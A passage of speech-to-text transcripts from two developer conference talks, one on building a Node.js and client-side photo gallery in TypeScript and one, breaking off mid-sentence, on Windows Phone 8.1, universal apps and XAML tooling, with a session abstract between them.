and then voila, we have types. I didn't say but you can see here in my solution that I'm using an app.ts file instead of app.js file and in the output here, you can see app.js and it is compiling. The TypeScript compiler will compile even though it burns you that you are doing something wrong because JavaScript is a dynamic language. You might be using things and want to do such stuff but you get the warning from TypeScript compiler. So once you know a little bit about TypeScript, let's go on. So what are TypeScript key features? TypeScript includes all the things you know about JavaScript and it is a superset of JavaScript because it adds a lot of things to the JavaScript. For example, the way to do encapsulation. Interfaces, classes and models. You can write models using the model keyword, you can write classes using the class keyword, you have lambda expressions inside of TypeScript and even generics. You know the team that wrote TypeScript in Microsoft is Andres Helzberg. So Andres loves C-Shop and is the father of C-Shop and of course TypeScript will include something like generics. But the IDE also gives you intelligence using TypeScript and syntax checking. You saw that earlier. So you have type safety here and you don't have to get into the pitfalls that we saw earlier at the beginning of the session. How the magic works? So you write something in TypeScript and then in the IDE it uses under the TSC.exe, the TypeScript compiler in order to compile your TypeScript code into JavaScript. More than that, you don't have to use ID His. You can use it in a command line. Just know that you have TSC.exe installed in your environment. Once you have that, you can do it in any operation system, in any environment, in any host, whatever. TypeScript includes features like type annotation. You can do something like var str, colon string and to emphasize that this is a string. You have five types in TypeScript, sorry, in JavaScript which is number string, Boolean, null and undefined. TypeScript also gives you a sixth type which is called any. Any is a type that refers to anything. If you want to go dynamic, the dynamic way, then use any as a third type. More than that, you can see in the slide here that we have the opportunity to mark that a function returns something. It returns a string here and I annotated the function with a string. TypeScript gives you the opportunity to use classes and interfaces. Interfaces in order to type check that you implement something in your code and classes to organize your code. You can write the class keyword that comes from ECMAScript 6 today using TypeScript. Later on, when ECMAScript 6 will be valid and will be part of JavaScript, then you have your implementation aligned to ECMAScript 6 which is something very important about TypeScript. A lot of the features here in TypeScript are coming from ECMAScript 6. Once you go the TypeScript way, you write most of your code in ECMAScript 6. There are a few features that aren't aligned to ECMAScript 6 like generics and enum but the majority of the things that TypeScript adds to the JavaScript language are from the standard of JavaScript. More than that, you have classes, then you can use models. A model is a container that wraps functionality classes and interfaces into one model. You can use import keyword to import models into your code and export to export something from the model. Once you have that models in your code, then you don't have to do things like what you see in the right hand of what is interpreted or compiled by TypeScript. You don't have to write this code. If you are writing plain JavaScript, then you must write the code on your right hand in order to create or wrap something into a model or namespace. We know a little bit about TypeScript. Let's jump into a demo and let's see TypeScript in action. I'm going to close this and I'm going to do something like that. The first thing I'm going to do is write my own model. If I press control S, then nothing happened in the compiler. Why? The model doesn't include any code, so the compiler is smart and understand that I don't need to do anything in the compilation. Once I have my model, let's continue and add an interface. An interface here, which is called iGridder, tell me that I need to implement a grid function inside of my code. That interface is exported from the model, but again, nothing going out to the output. This is because interface are key feature in TypeScript, but they don't have any meaning in JavaScript. So I want compile it. So we have our interface. Let's add a class. Sorry. And here, let's close this. I'm saving the class and let's take a look at the class. I'm exporting that class from the model. I'm implementing iGridder, meaning that I need to write a code for the grid function, which is void. It returns nothing. What it's going to do is just output to the log, the grid that I got inside of TypeScript, and output to an element the same grid. You can see here that I have a private keyword, which is transferring the grid variable into a private member. That means that if I'm using TypeScript, I won't see that member outside of the class. And I have a constructor here. That constructor keyword is aligned to ECMAScript 6. This is how you write a constructor in ECMAScript 6. In the constructor, I'm just getting a string and I'm putting it inside of this grid. Once I finish that, let's go on and finalize the example here. I'm using the Windows AddEventListener and I'm wiring the DOM content loaded, the event that was added in HTML5, in order to catch the moment that the DOM itself was loaded. You can see a feature of TypeScript, which is a lambda expression. The callback here is a lambda. And here is another lambda that I'm wiring to the click event of a button in my web page. And a few things to notice here is this thing, which is casting in TypeScript, you do cast using this notation. So I'm casting the returned value from getElement by the txt name into HTML input element. And I'm getting out the value from a text box. Later on, I'm creating my own gritter using the model that I wrote earlier, the app.gritter. And just getting the name that I got from the text box and printing something using the gritter.grit. Let's see it in action. So running this code. I'm doing NDC. Grit, hello, NDC, if I open the DevTools, hello, NDC in the console, and we are here. So this is a very, very simple example of using TypeScript, using classes, models, interfaces. You saw casting, you saw type inferred by strings or numbers, et cetera. And you saw lambda expressions. But we are here because we are building major applications. We are building end-to-end applications. So let's build a simple end-to-end application using TypeScript. So the first thing that I've done here is just created a new project in WebStorm for the Node.js Express app template. If you're not familiar with Node.js, Node.js is a server-side implementation using JavaScript as its main language. Node.js comes with a lot of good things. One of those things is the Express framework, which gives you the opportunity to write MVC applications using Node.js. So we are going to use Node.js with Express in order to create a simple web application. So the first thing that I've done is changing the app.js here into app.ts file, and I'm going to use that ts file in order to create my node implementation. So let's do that. Most of the code here is just part of the template for Node.js Express. I will highlight only the things that I added. So the first thing that I added here was a function called walk. That function is going to get a folder name and a callback, and it will return from the folders all the file names. It will return the file names in order to, with a relative path, in order to decline inside to get those file names and use them later on. So what I'm doing here is using FS or file system model in Node.js to read a folder, the folder that I got, and in the callback, and you can see it, that the callback here is using lambda. If I'm getting an error, then I'm returning nothing from the callback, an empty array. If I don't have an error, then I'm using files.forH in order to iterate all the files in the folder, and I'm just writing to the result array the file names. And I'm doing the callback at the end. That is a simple function that gives me the opportunity to iterate and output all the file names in one place in my implementation. All the things here, all the environments are part of Node.js express template, and I only added this part in order to do some stuff. So I'm creating an endpoint called get all images, and that endpoint is going to work on a public folder here, public content photos. This is something that you can see here. I have three images, and it is going to write to the output a JSON from that array that I got earlier from the walk function. So I'm stringifying that array, and I'm sending it to the client side, and that's all. That's all the implementation I'm using. Later on, I'm just starting my server using planned Node.js code. So let's run the application right now. I'm listening on port 3000, and let's go to port 3000, and nothing. What the application did was it returned the HTML file that I have, which looks like something like that. It has nothing inside of it. If I'll go to get all images, then you can see the JSON returned from the server with the images. And as you might expect, I'm going to build a photo gallery, and I want to implement the client side using a library, which is something that I'm going to do right now. So we have an implementation for a server side. Let's go on and implement our client side. And as I said, we are going to implement the client side using TypeScript. So the first thing that I'm going to do is I'm going to create data structures. Those data structures, or if you know me, I'm a fan of domain-driven development, will be the domain of our application. The data structures are going to be implemented in a very strongly typed implementation, which is typed to a library that I'm going to use. That library is called Galeria. I downloaded the library earlier. Here it is. And it will enable me to show the photo gallery beautifully. So I need to be aligned to the Galeria objects, and I've just created my own object to represent the data that the Galeria need to use. So let's take a look at the code here. I've created a model called app.data.structures. That model is going to wrap all the data structures in my code. I'm exporting from that model a Galeria image config options, an option class that I'm going to use in order to configure each Galeria image that I'm going to show you in the client side. You can see here that I'm using the constructor keyword, and I'm using syntactic sugar to implement properties. One of the ways to implement properties if they don't need to do anything is just getting those properties in the constructor using the public, the name of the property that you want to expose, and the type of the property. So we have here a lot of properties that I'm creating, and that's the only thing that you need to understand about this class. The second class here is a Galeria image. This is an implementation for an object that will expose data in the Galeria representation. So it gets in the constructor a Galeria image config options, and it puts it in the options variable, which is a private member of a Galeria image. And later on, you can see here that I have a lot of properties that I'm exposing. The get and set are part of TypeScript. They will be part of ECMOScript 6, but currently they are not. So in order to create a property, I can do something like get image, and I'm returning the image that I'm storing in the Galeria config options, or I'm going to set an image, and here I have a logic that says if I don't have an image, throw an exception. Later on, you can see I can drill down, and I have six properties implemented here. If you want to see the output of the code, let's open this JS file. Let's compile it. Didn't compile. Okay. We've got it. And you can see here, first, the model that is compiled into a lot of immediate function execution, and later on, we can see that I have a constructor function, and I return it as a Galeria image config option, and we can see that the Galeria image was compiled, and in order to create a property, it is using the object.define property, which is something that you can use from ECMOScript 5. So it uses good practices in JavaScript in the compiler. Then Douglas Quirkford said about TypeScript something very interesting. He said that from all the JavaScript processors, TypeScript generates the most beautiful JavaScript code that he saw. And then after he said that, he said in another place that he didn't say that, but it's online. So we have our data structures, but we can't do anything with data structures, right? We can, but we need other things to implement before we go on. So the second thing that I'm going to implement is a data service. We have a server side, and we want to get to the server side. I'll implement a class called data service in order to send requests to the server. So let's implement it. In this model, you can see a few things. The first thing is I'm importing, using the import keyword, the model that I wrote earlier, the abdodata.structures. Later on, I'm exporting from this model from abdodata the interface, which is called IData service that forced me to implement a function called getimages, which returns a jQuery promise. If you use jQuery, then you know that I can use promises with jQuery, and promises is something that I prefer to do once I'm going to the server side, because going to the server is asynchronous operation, and promises help me to write code, asynchronous code, like it was synchronous, and wait for something to happen. This is the promise. They promise that something will happen or something will fail. Saying that, from where I get that jQuery promise? In TypeScript, one of the things that you need to understand is that we have declaration files. What is a declaration file? Declaration file is just a file. Sorry, the table here is not fond of my mouse and takes me a lot. This is the declaration file for jQuery. Declaration file is just a file that says that the library is typed in TypeScript, and later on, I can import that declaration file. You can see it here in the beginning, and use the typing of a library. Not all the libraries out there have a typed declaration file, but one place that you should go to if you are working with TypeScript is definitely typed. Someone called Boris Yankov uploaded a GitHub many, many, many declaration files for many, many libraries out there. For example, if you want to use AngularJS with TypeScript, go to here, download the declaration file for AngularJS, put the reference, and bang, you are working with AngularJS in TypeScript. More than that, if you are a fan of Backbone like I do, then you can find Backbone here, the type declaration file, et cetera, et cetera. At the end of the session, I will give you a reference slide, and it definitely typed is part of the reference. So we have a declaration file, and we use jQuery promises. Let's go on. I am implementing the data structure object here, sorry, the class, and I am implementing the get images. What get images is going to do is it is first creating a deferred object. This is the object to wrap the promise that I am going to return. Later on, I am doing get JSON function in order to go to the server to the endpoint get all images. I am getting the array of images. I am iterating that array, and I am pushing to the return array here, which is using the type of Galeria image. I am pushing it to it new objects with the relative path of the image that we saw earlier. Once that done, I am resolving the promise, and I am returning the promise from that function. So we have implementation that wraps the data service, and it gets all the images back from the server side. Let's go on and let's bootstrap our application. So in the bootstrap here, I am going to use the Galeria itself. That Galeria expose an object called Galeria, and it represents that photo gallery. On the other hand, Galeria doesn't have a declaration file. So what can we do? This is not a typed library. So the first thing that you can see here in the code is declare our Galeria. Once I do declare something, then that object is referenced as any. It gets the any type in TypeScript, and we look at it as it's a dynamic object. So I can use it everywhere without knowing anything about the object itself. So once you go that path, you need to understand the object that you use because it's dynamic. We are getting back into JavaScript. Sorry. Later on, I'm creating a model that imports app.data that exports an interface called iBootstrap that includes only the run function, and here is the implementation of the class bootstrap. Just this.getData. Here is the function.getData. The function returns a promise, and it goes to the data service and calls its getImages function. That's all. Once the promise finishes, then I can wire a then function which is going to do something. What it's going to do is it's going to configure the Galeria. So this is something that I won't get an intelligence for, the Galeria.configure, because it's any. It's a dynamic type. So I need to know how Galeria works, and I know, so I'm putting the data source as the images that I got from the server side, and I run the Galeria on some object in my DOM. Okay. So I've built all of this, I want to run it, so let's put the code that runs all the stuff. I'm wiring an event listener to DOM content loaded, and in the event listener, I just bootstrap my application. That's all. Once I do all this stuff, then I can go to local store, local host, and run local host, and voila. I have my photo gallery application using end-to-end TypeScript, meaning that I'm using it to represent the things in Node.js, and using a few libraries in the client side, Galeria and jQuery, all together in a typed way that can help me to avoid a lot of pitfalls like those that we saw at the beginning of the session, and more. And this is the greatness of TypeScript. It helps you to write more maintainable and scalable code. With that, let's go to questions. Yes. What about unit testing? Okay. So TypeScript doesn't include unit testing, but you can use any JavaScript library for unit testing. For example, tomorrow I'm going to talk about Jasmine, BDD library to do unit testing in JavaScript. You can use that. And Jasmine has a declaration file, and you can use Jasmine as using TypeScript. So it's something like that, but I know it's something which is very important, and you can use a lot of the libraries out there, JQ unit, etc., using TypeScript, but it's not part of the language. Any other questions? Yes. What about debugging? What about debugging? Okay. So what I didn't explain here is you can see here that once I'm writing something in TypeScript, I'm generating the app.js.map. I'm using source mapping in order to map my TypeScript. So every developer tools like IE developer tools or Chrome Dev tools can use those source maps in order to help you debug TypeScript files. In the client side, you have JavaScript, you are downloading JavaScript, but you can debug TypeScript using the IDs or using source maps. It's like any other language. Yes. Do they do it? Yes. Okay. Chrome Dev tools use source mapping, and IE from version, I think, nine or 10 are using source mapping, and of course, Firebug in Firefox if you want to use TypeScript with Firefox also. Visual Studio, it's built in, so you can debug inside of Visual Studio anything in TypeScript. Any other questions? Yes. Yes, you can use what, you ask, ScriptShop gave you a minified version of the compiled code. Right here, you don't see a minification of the code, but you can use TSC with the handle in order to create a minified version of your code. It was part of Visual Studio on Web Essentials, Matt Crissons sense plugin, and you can use that using configuration inside of Visual Studio in the WebStorm. You just need to configure WebStorm in order to do that. You just configure the file watcher, and once you save the file, it will generate also a minified version of your code. Okay. Yes. What's the future of TypeScript? What's the future of TypeScript? Okay. TypeScript is currently in version one. As I see it, once ECMAScript 6 is out there, then you get all the things that TypeScript include, but you have a lot of other stuff that TypeScript include that ECMAScript 6 doesn't include, for example, generics, enums, and more. I don't know what is the future of TypeScript, like any other language, it depends on the source for that language. We all know that Microsoft are killing some languages or some features that we are all used to or used in the past. I can speak for Microsoft. I'm an MVP. I'm not working for Microsoft. I'm not working in the TypeScript team. But hopefully it will stay here as long as we don't have ECMAScript 6 out there. Okay. It looks like when ECMAScript 6 is there, then TypeScript is no longer there. I don't think so. ECMAScript 6 has a lot of issues. Those issues are it's coming from the community and in the specifications, there are bashing... I mean, Apple, Microsoft, and Google bashing one in one of each other in order to drive to features that they want in ECMAScript 6. I don't know when it will go out. It was supposed to go out in 2014. Okay. It's not out. What are the alternatives to TypeScript? You saw here in a previous slide, you can use Dart from Google, but you have to learn the Dart language. You can use CoffeeScript from Jeremy Ashkenaz, but you will need to understand the dialect of CoffeeScript. You can use ScriptShop. Nick Hill-Coutari's project, which is writing code in C-Shop and compiling into JavaScript. You can use ClosureScript and there are other alternatives to TypeScript. None of them uses JavaScript to compile into JavaScript. You'll have to learn another language in order to use them. Yes. Yes. This is the actual this. It's not use... Sorry, it's not... It's going to save your scope. Once you compile... Okay. When you use a lambda, then you can construct that. Yes. Then it will make a closure around. Yes. It will make a closure around the variable, which is called self. When you're not using that. It is part of the language. This in TypeScript is really this, like we are used to in object-oriented. It's not something that you need to afraid of. This and that patterns and not understanding scoping in JavaScript can harm you. These are one of the major pitfalls in JavaScript. Here, whether it's in lambda or in the code that you write, this is really this. Can I answer the question? It doesn't quite match my personal experience. You wrote code that this is not part of a lambda expression. It's a part of lambda inside of another lambda or something like that. If that was the thing that you did, then in TypeScript 0.8 and 0.9, it wouldn't compile right. I think that they fixed it in version one, but I'm not sure then I can't answer that without checking it. Any other question? The last question? If you want to find something negative about TypeScript, what would it be? What's the negative thing about TypeScript? For me, in my experience, it was in minor versions, not version one, a lot of memory relics. TypeScript included in version 0.7, 0.8, and 0.9, memory relics that you will see those memory relics not right now in the version one, hopefully, once you are reaching more than, I think, 500,000 lines of code in TypeScript. We got in a very major enterprise application that includes, I think, 700,000 lines of code in TypeScript, memory relics that crashed the whole Windows. This is one thing. The other thing is a lot of features that are included in TypeScript, which I think aren't necessary at all. For example, the generic in TypeScript, I don't like it. It's not feeling right for me because I'm coming from a JavaScript background and it's nonsense for JavaScript. But this is my own opinion and not something that everybody thinks of. If you have any other questions, then come to me after I wrap up this session. I'm going to wrap up. TypeScript is open source. You can go to Codeplex and take a look at its code. It's currently in version one. It's out there. You can use it, I think, almost two years. It has a lot of features which are very, very missing from JavaScript, whether it's models encapsulation, classes, interfaces, a lot of good stuff that we are really, really hoping that JavaScript will get there at the end. Right now, it's not there. You can use TypeScript today and write your ECMAScript 6 off tomorrow. Here is the slide for all the references, the resources. You can download the slide deck. You can go to TypeScript.org, TypeScriptlang.org in order to learn more about TypeScript. This is definitely TypeLink also. If you want to follow me on Twitter, it's at Gilfink and link to my website. Let's wrap up. Use TypeScript because it brings ECMAScript 6 today. This is the main issue in TypeScript. Do it and use it because of that. Thank you. If anybody has questions, come. I'm here. You can come and talk with me.
Creating cross-platform, application-scale JavaScript code that runs in any browser or in any host is very hard. TypeScript is a programming language that changes that situation. In this session, you will get to know the TypeScript language. You will also see how to build an end-to-end web app using the language.
10.5446/50546 (DOI)
this small laptop and this little space here. Thank you for coming. I'm happy to see so many people are interested in Windows Store and Windows Phone. I was trying to come up with a really, really good title for this session, but I'm not a big fan of the sexy titles like, why you completely suck if you don't watch my session type of titles. So I just went with something somewhat boring, what's new, Windows Store and Windows Phone, because I can't possibly cram into the title everything we're going to cover today. I changed my abstract, so I'm not sure how many have read the new abstract with a little bit more information. I submitted the abstract before build and I was in the aid, so I couldn't share exactly what I was going to talk about, because a lot of it wasn't official yet. Now it is, so the abstract has been updated. We are going to talk about what's new in Windows Store and Windows Phone, but also what is new surrounding those two technologies. So we're not going to cover just that. I will not be focusing a lot on APIs and API changes. I will walk through some of them, but demonstrations are mostly centered around architecture, Windows runtime components, class libraries, universal apps, and so on. Because I think that's where you gain most from actually watching a session, because with APIs and so on, you know, you have the information online, you have the documentation and you look it up when you need it. So this is, I wouldn't call it an architectural session, but there's a fair bit of that. My name is Iris Claussen. I'm a C-sharp MVP and a bunch of other titles. I'm a software developer for a company called Identity Mine in the US. I live in Sweden, though. I'm also a Pluralsight offer. And because of the density of this session, if we don't have time for questions at the end of the session, come up afterwards and you can also grab a free one-monthly pass for Pluralsight if you want to try the courses there. And I'm also an O'Reilly offer. And I have with me two books. And the first two people to come up here and ask questions afterwards will get a copy of the book if they want to. It's for Windows Store, but hooray! Now it applies for Windows Zone and I might have a chance of actually making some money off the book. Not really, though, but okay. I'm usually, you have one picture of yourself on the slide. I don't know why, because usually they're in person. But anyways, I have a lot of pictures. They updated the picture on the next to the abstract. I think it was yesterday. I changed my hair color a lot. So you might have seen me with something like this. And I don't know what my hair is going to look like tomorrow. Let's talk about what we are going to cover in this session. So I tried to group things a little bit together, but we're going to cover things that are related but still kind of differ a fair bit. So I'm going to try not to jump around too much, but I will need your full attention. I'm going to talk about convergence and sharing. We're going to talk about, we're going to talk about convergence. I'm also going to talk about what's new in Windows Phone. We're going to talk about Silverlight, Windows Runtime, and also doing applications with JavaScript and HTML. I'm going to talk about universal applications. I will not spend a whole lot of time on universal applications, because they are so simple that they don't need that. We're going to talk about what's new in portable class libraries. There are actually a few things that I didn't even see at a single session at build. Somehow it went completely unnoticed that portable class libraries have had quite a few changes. And I think that's a shame because the team at Microsoft has done a fantastic job with the libraries. I'm going to briefly talk about the offering tools. Some new, some not so new, but it's good. Some of them which are not new makes more sense to leverage today now that we have new sharing capabilities. I'm going to talk about components, Windows Runtime components that is with the most focus being on the new brokered components, which are components that allows us to use legacy DLLs in a Windows Store application, which is really neat because finally we can actually have some decent line of business applications reusing DLLs. I'm going to talk about side loading and also deployment, the store, the dev portal, and changes there because there's been a fair bit. And throughout the session, I'm going to recommend a couple of Visual Studio extensions that are good to have and a little bit nice, neat tricks. And at the end, I'm going to show you where you can go find a lot of samples for in particular universal applications. And that's where you're going to find all the examples of how to use the new APIs and so on. Let's talk about Windows Phone 8.1 Silverlight. So Windows Phone now exists in many forms and the Silverlight is still there and is not dead. TDD is not dead, Silverlight is not dead, it's still alive and somewhat thriving in the dark corners in the forest. We now have Cortana, which, Cortana, have anybody here tried Cortana? Yeah? I live in Gothenburg, so asking for weather always gives me Gotham, which is interesting. If I had Sweden at the end, she would actually tell me the weather. What's really neat about Cortana now, you still use the speech APIs exactly like you've done before, but it leverages more of a natural language so you don't have to use grammar files for the tiniest, tiniest little things. And that's why it makes a big improvement for us as developers if you have applications that use speech. And I dare to say that so far we have this best speech recognition and text to speech among the mobile platforms and I'm kind of hoping to see more improvements there as well. We now have a lot of triggers and conditions in Windows Phone and one of them is, one of them is Geofencing. And Geofencing basically lets you set locations and trigger an action based on that location. We have roaming data between Windows Store and Windows Phone, which is quite neat. And this is something I've used with Windows Store a lot. I'm very happy we have that in Windows Phone as well. It gives us, it gives the user more of a feeling that it's the same application, although it's two different applications. We have also a start screen backup and app data backup on the OneDrive and this does not come out of the user's OneDrive, what do you call it, capacity. It's not a lot that it takes anyway. We have so many new tile templates, but most important we have a custom tile helper class which lets us create tiles anyway we want to. They're really pushing forward tiles. Applications never close on back. That's quite important to know and it's also important to know that when you launch an application from a tile now, it doesn't start a new version of the application. It launches the same application that was there before. So that's quite important to know. We have the action center and the action center has significance for us as developers because in the action center we can have our notifications and this brings me to that we now have a common notification service. So you only need to create that one channel to target both Windows Store and Windows Phone. And the memory management has been improved and is now dynamic. So in very, very dense, this is kind of what's new in Silverlight. And there are, although there's been a lot of convergence and a lot of talk about now we have everything, you know, on both platforms and so on. There are a few things that we only have in Silverlight which we don't have in WinRT. So what we have in Silverlight for Windows Phone, which you might take into consideration if you're starting a new project today, is if you want to use Lens and Support, if you want to use the Clipboard APIs, Camera Capture Tiles, Green Tone Provider, Search Extra, Screen Lock, Lock Screen Wallpaper API and a few more. There's a list on MSDN. Take a look there because if you have an application that relies on one of these, you might want to wait with updating the application. The biggest change for me at least personally hasn't been all this because, you know, having, having new additions, having new APIs, it's not, it's something I kind of expect. This is, however, for me the really big news. All the options that we have, it's a little bit overwhelming. If you were to open this today, it's the first time you're doing a Windows Phone application and you have all these options, it would be really hard to kind of select something. This reminds me before, like, when you want to start a new web application and you had all the options. I'm kind of expecting to see just a one store option there at the top and then, then you can download templates for what you need. So we have a lot of options to choose between. I'm going to show you in Visual Studio. Here, let me tab out. For some reason, let's see if it works. For some reason, the computer keeps jumping out of the duplicate mode every time I end the slideshow. I'm not going to do any file on your project. I assume everybody knows how to do that. I want to show you three examples here. I hope you can see on the right-hand side. It's a Windows Phone application. So you can still develop for all the Windows Phone platforms. If you're targeting Windows Phone 8, it's going to look like before. If you target Windows Phone 8.1, there is one difference that you will notice, that we now have a package app, Apex Manifest there. We still also have the old manifest file, which you see here, but we have this in addition. So the one at the top is the Windows Phone Silverlight. The one in the middle is Windows Phone Silverlight 8.1 and the one at the bottom is Windows Phone WinRT 8.1. And as you can see, it only has an Apex Manifest. You can see a transition here that here at this point you have both and then in the WinRT version you only have the manifest. And it's kind of where they're heading with Windows Phone as well. While we still have support for Silverlight, it was quite clear that it's just for buying us time. At some point, there will not be further support for Windows Phone Silverlight. So you might want to get used to the thought that you have to transition over to the new XAML stack, the common XAML UI. So these were some of the options. I'm going to get back to some of the other Windows Phone projects that we have, but I just wanted to show those first. Let me go back to the slide here. It keeps jumping out of presentation mode, sorry. This is something that came with the update and is literally driving me insane. All right. So two other things that we have, no one other thing that we have in Windows Phone now is we can finally create HTML and JavaScript applications within the phone using language projections, which means that you have full access to the same APIs as if you were writing it in C sharp. Now, this is not the same thing as the previous HTML template, which was with Silverlight, which was basically just a browser control. I personally never even used that because if I wanted to use that, I would just go ahead and just use PhoneGap, for example, which I really don't want to use. What's really neat about the HTML and JavaScript applications that we can leverage third party libraries and I wanted to try this. I'm not very much a JavaScript developer, but I had the pleasure of attending Mr. Scott Allen's workshop on AngularJS earlier this week. We were given a choice between.NET, ASP.NET, MVC, or Node to go through the labs and I decided on doing Windows Phone instead and see how that would work. Now, since this is a mobile phone, naturally there are going to be some differences and that also means that you have to do a little bit of tweaking. So I had to do some changes to Angular to make it work, but not as much as I thought I would need to. I'm going to show you how it looks like. And I'll have to keep doing this all the time. Does anybody know why it does that? I've tried it on three different computers and it keeps jumping out of presentation mode. Let me go to the application here and close this. So, yeah? Yeah, it's all tabs it goes to, goes out of. Yeah, it's still, yeah, it is what it is. I don't have a lot of slides, thankfully, so I have a lot of code to walk through and actually I'm going to close down this because I don't want you guys to be distracted by this. Okay. Back again in Solution Explorer, this project called Not the Same. This is the old HTML template and it's basically, it is a silver light application with a browser control. Now we have, I guess we can call this native HTML and JavaScript and here is the application. Let's see if I can make this. Run. Hmm. Okay. See if that's the right emulator. My emulator image got corrupted in the update I did last night. So I would probably hold off on that update. But the application should work. So this is the application, the result of the lab. It's just, it's not anything fancy but it does prove that you actually can use Angular. Very simple application. Just you see all the different movies and you can increase or decrease the rating. You can edit. There's, let's see, there's validation and sorting, filtering, searching and so on. To be able to make this to work, I added the AngularJS and I had to do some patching because in WinJS you don't, it's not allowed to use, to load dynamic content. And I'll show you quickly what I had to change there in the share project here. Yep. So this is a function you have in JavaScript. I'll, let me scroll in here. Execute unsafe local function. So when it complains about loading dynamic data, you have to just wrap it in this function. I'm not sure if I would use this in a production application, patching up Angular because you might forget to patch a new update. So there are other ways to go about it as well. But I just wanted to show you that you can use any third-party library that you want, but be aware that this is not a web application so therefore you will need to add some modifications. It does make it easier if you want to reuse something that you already have. And as you might have already noticed, I'm actually in a shared project which I'm going to talk about really soon which is related to universal applications. So what I have here, I could literally, I could share it across to Windows Store application which brings me back to the slides and let's see if it jumps out again. Yeah, sure. Just a moment here. Yeah, slideshow. I will say, everyone, I said it to primary monitor because I wonder if that's going to help as well. Well, we'll see. Thank you, Scott. Is that what I get for kind of promoting your workshops? Universal applications, it's just a new solution template that really simplifies the way that we can share code. Think linked files, if you have linked files, it's what we're doing. Apps can share code and they can share views. In regards to views, we use the common XAML UI. Windows Phone now has a project type which does use Windows runtime and also uses the new XAML stack. And of the controls, you have 80% that is in common and 20% that is adapted which means that they have a slightly different behavior, slightly different look, but they still use the same underlying APIs. And the reason that there were always going to be some differences is because the user expects different things because there's a big difference between a tablet and a phone. Maybe not so much this phone because it's quite big, but different user expectations depending on the device. I'm going to show you an example, see if this works. It might actually be working. I'm going to go out of the universal application. I'm going to show you instead. As I said, I'm going to skip the file new project, just file, add new project and then you will find on the store apps, you will find universal applications. Let's have a look at universal applications. When you create a new universal application, you get free projects. You get a Windows Store, a Windows Phone and a shared project. With time, we will have Xbox as well, but not quite available to us yet. The shared project, I guess you can just call this virtual folder where you have everything that is being shared. As you can see, I am sharing both the store page and also the main page of the application, which you can do, but I think you're going to find yourself having problem having a layout that's going to scale just as fine to this size of a screen, to this size of a screen, to an even tinier screen. Usually, you're not going to end up sharing whole pages, you're going to end up sharing user controls. Let me open this and show it to you. I want to point out also that you can see on the references here that the shared project is referenced from both the Windows Phone and also from the Windows Store, but that's not so important right now. I have a very simple application, it just says hello world. We can stick with hello world for now because we just want to see the interaction between the different components. This is just a very, very simple text block there and then I just pass in hello world. I'm going to show you something in two seconds. I'm going to show you how you can share code in different ways. This is how you can do it in a universal application. I have my code file and as you can see, I'm using conditional compilation. If you don't know what that is, it's basically just telling the compiler what to compile based on a symbol and this is a symbol and this is a symbol. If you wonder where they are, just right click on a project, you go to properties, you go to build and then you have conditional compilation symbol and you see them here. As long as you use a semi-colon to separate them, you can add your own. I would however prefer to stick to the existing ones so another developer looking at your code knows what on earth you're doing. Now conditional compilation, although it's really, really ugly, it does work quite neatly and as you can see, we have really good intelligence support. It is only highlighting with my beautiful syntax highlighting there. I love the colors, yes I do. It only highlights the application that we're actually working from which brings me on to talking about offering tools which we'll do very, very soon. But this is how we can choose to output different things depending on which platform we are filing from. It's a simple example but it does scale pretty well as well. Let's go back to, and this is it with universal applications. I'm going to show you a little bit how you manage the views. Let me just, so in short, with the common XAML UI, I talked about the ones that are in common and the ones that are optimized referred to as primitives or tailored slash optimized. So the controls that are optimized list you fly out media player and the app bar command bar. Now offering improvements in Visual Studio. When you are targeting two platforms that are as different as they are, you got to manage the design as well. And although I don't really like working a lot with design, I found myself that as long as I'm doing XAML development, I always end up doing full stack developments. Very rare I've actually had a designer available to me. We have much better tooling support than we've had before. And I can illustrate that by going to the main page here and show you this. It's a little bit hard to see. Zoom it, do not have it installed right now. But you have a drop down menu and you can select Windows phone or just a Windows Store application and whatever other platforms you have targeted and it will switch between them. It works 90% of the time for me. Sometimes it kind of lags a little bit. But you can easily switch here. And when I do that, as you can see, it switches here in the designer as well. And the device window has also been polished a little bit. To find the device window it's easier just to hit control Q and it brings up the quick launch menu at the top. You start typing device and you're going to see it as an option. So the device window is going to let us see without actually running the application, how it's going to look in different scaling, different contrast, different themes and so on. And as long as you use the navigation menu and switch between Windows phone and Windows Store, you can do a lot of editing without having to run the application which we know takes a lot of time. We also have other navigation menus here to find things. Talking about that, I wanted to mention a little thing which I am not going to show now but I've gotten this question a few times. How do you format XAML? Because you're going to end up with a lot of XAML now. If you want to format XAML, there's actually an option you can set to auto format XAML and we've had that around for about four years, I believe. It's just well hidden. So you go in options and under XAML, position each attribute on a separate line so take that and you'll be able to. Okay. Let's talk about how we manage differences in the view. Because managing the differences between in code you can use conditional compilation which I showed you here. But how do we actually do with the view? Well, there are a few ways we can go about it. I'd like to show you something here. Be aware that what I'm showing you here is it hasn't been tested a lot. It's still in beta. So if you use it, use it with care. There's a developer, the same developer that made XAML spy, which I'm going to demonstrate. It's also made a nice little NuGet package which allows us to do conditional compilation in XAML which is quite neat. So the way it works after you add it, it's called the XAML conditional compilation XCC. You define the symbols at the top, pretty much kind of as we do in C sharp. And then you just wrap the elements that you want to use using them. There were a few bugs which I notified him about, I think, two days ago and he fixed it within 20 minutes. So he seems very keen on keeping this project up to date. And it's definitely worth a try, but we'll be very careful bringing this into a production application without having some decent testing and making sure that it won't break. That is one way you can go about it. You want to have everything in there. Now, what you can also do is if you have the exact same user control, as you can see here, I have a child user control which is this one here and if I switch to Windows Phone, let's give it some time to load, it should bring up the Windows Phone one which is a different color. As long as you use the control in XAML and it exists in both the projects and it will let you know if it doesn't exist in both projects, we get really good help here from Visual Studio. It will bring in the right one. So it's very easy to actually handle the user controls. And I think modular model or architecture of the application is something that is easier to manage than actually managing whole pages at a time because you can share user controls more than you can share pages because of just the scaling basically. And XAML Spy, I'll show you XAML Spy here. Let's see. I'll just run the emulator. See if I... I can't run XAML Spy on the JavaScript application yet. He might add support for that later. I'll use... This is just a hub application. I haven't made this one. All right. Let's see. Select Visual. So this is XAML Spy. What it allows you to is basically debug XAML at runtime. And it's helped me a lot in particular when I've been working with animations. And I just find working with animations a tremendous pain. You can write... If you purchase a license for it, you can actually run just a ZAP package if you want to. Otherwise, you can run it from Visual Studio like I did now in the emulator. And we'll bring up a window here and you can go and take a look at all the different properties that you have for an element. For some reason, they're not all showing up here, are they? Let's see. Hmm. That's interesting. Well, it seems to actually have problems loading the XAML stack. So how's that for debugging? That is XAML Spy. And this is not a session about XAML Spy. And it's definitely not a new addition here for Windows Phone. Portable class libraries. So we've been talking a little bit about sharing logic. And I do find that in particular, portable class libraries kind of go very much unnoticed. And I'm not quite sure why. Not everybody 